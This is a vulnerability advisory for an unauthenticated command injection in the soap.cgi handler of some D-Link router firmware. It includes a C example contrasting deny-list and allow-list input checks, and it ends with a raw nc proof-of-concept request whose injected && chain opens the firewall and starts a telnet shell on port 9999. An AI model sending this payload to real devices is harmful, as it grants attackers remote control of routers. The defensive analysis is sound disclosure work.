D-Link Unauthenticated OS Command Injection

Vendor: D-Link

Firmware version: DIR-818LW_REVA - 2.05.B03, DIR-860L_REVB - 2.03.B03

Exploit Author:

Vendor Homepage:

Hardware Link:

Vulnerability details

I found an unauthenticated remote code execution vulnerability in the soapcgi_main function of the cgibin binary.

An unauthenticated remote attacker can execute arbitrary shell commands by sending an HTTP POST request to /soap.cgi on TCP port 49152 with a crafted service GET parameter.

A similar vulnerability was already reported as CVE-2018-6530, and some firmware releases added character sanitizing of this parameter using the strchr function.

However, the firmware versions DIR-818LW_REVA_PATCH_2.05.B03 and DIR-860L_REVB_2.03.B03 do not filter all of the dangerous characters.

The && sequence is not rejected, so commands can still be injected by chaining them with &&, and the device remains exploitable.
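The following C program is an added illustration and is not code from the D-Link firmware or from the advisory author. It contrasts a strchr()-based deny-list check of the kind described above with an allow-list check, and shows that a payload chained with && passes the deny-list while an allow-list rejects it. The characters in DENY_LIST and the sample service names are assumptions made for this example; the firmware's real filter set and command template are not known here.

```c
/* Added example: strchr() deny-list vs. allow-list validation of the
 * soap.cgi "service" parameter. Not the firmware's code; the set of
 * rejected characters below is an assumption for illustration. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed deny-list: common shell metacharacters, but '&' is missing,
 * which is exactly the gap a "&&cmd&&" payload walks through. */
static const char DENY_LIST[] = ";|`$";

/* Deny-list check in the style of the patched firmware.
 * Returns 1 if any character of `service` is in DENY_LIST, else 0. */
int denylist_rejects(const char *service)
{
    for (const char *p = service; *p != '\0'; p++) {
        if (strchr(DENY_LIST, *p) != NULL)
            return 1;
    }
    return 0;
}

/* Allow-list alternative: accept only characters a legitimate service
 * name can contain. Spaces, '&', ';', '|', quotes etc. are all refused
 * without having to enumerate them. Returns 1 if accepted, else 0. */
int allowlist_accepts(const char *service)
{
    if (*service == '\0')
        return 0;
    for (const char *p = service; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.' || c == ':'))
            return 0;
    }
    return 1;
}

int main(void)
{
    /* Constructed payload modelled on the PoC in this advisory. */
    const char *payload = "&&iptables -P INPUT ACCEPT&&telnetd -p 9999&&";
    /* Constructed benign value; not a real D-Link service name. */
    const char *benign = "ExampleService1";

    printf("deny-list rejects payload:  %d\n", denylist_rejects(payload));  /* 0: bypassed */
    printf("allow-list accepts payload: %d\n", allowlist_accepts(payload)); /* 0: blocked */
    printf("allow-list accepts benign:  %d\n", allowlist_accepts(benign));  /* 1 */
    return 0;
}
```

Even an allow-list only narrows the attack surface; the robust fix is to stop handing attacker-controlled text to a shell at all, for example by invoking the target program with execve() and passing the service name as a separate argv element rather than building a command string for system().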


Proof of concept (replace <target> with the device's IP address). The request is sent raw with nc so the query string reaches the CGI exactly as written:

# nc <target> 49152
POST /soap.cgi?service=&&iptables -P INPUT ACCEPT&&iptables -P FORWARD ACCEPT&&iptables -P OUTPUT ACCEPT&&iptables -t nat -P PREROUTING ACCEPT&&iptables -t nat -P OUTPUT ACCEPT&&iptables -t nat -P POSTROUTING ACCEPT&&telnetd -p 9999&& HTTP/1.1
Accept-Encoding: identity
Content-Length: 16
SOAPAction: "whatever-serviceType#whatever-action"
Content-Type: text/xml

The injected chain first sets the policy of every iptables filter and NAT chain to ACCEPT so the new listener is not blocked by the device's firewall rules, then starts telnetd on port 9999. Connect to the resulting shell with:

# telnet <target> 9999